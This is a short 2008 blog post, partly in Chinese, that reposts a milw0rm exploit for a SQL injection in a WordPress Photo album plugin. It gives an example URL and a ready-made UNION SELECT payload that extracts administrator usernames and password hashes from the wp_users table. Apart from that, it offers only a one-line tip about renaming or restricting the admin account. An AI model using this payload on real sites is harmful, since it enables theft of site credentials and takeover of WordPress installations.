WordPress Photo album Remote SQL Injection Vulnerability

Home > wordpress支持, 漏洞 > WordPress Photo album Remote SQL Injection Vulnerability
Posted on February 18, 2008 by 白菜林

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

转载原创文章请注明,转载自:[Lin's Space|Only]

本文链接: http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/

Google比较注重原创性和时效性,若没有找到需要的内容可尝试以下搜素。

This entry was posted in wordpress支持, 漏洞 and tagged , , , , , , . Bookmark the permalink.

One Response to WordPress Photo album Remote SQL Injection Vulnerability

  1. wiki says:
    February 18, 2008 at 23:56

    This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin section under Manage then submenu Photos.Manage and create albumsMove photos to and from albumsUpload and delete photos

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>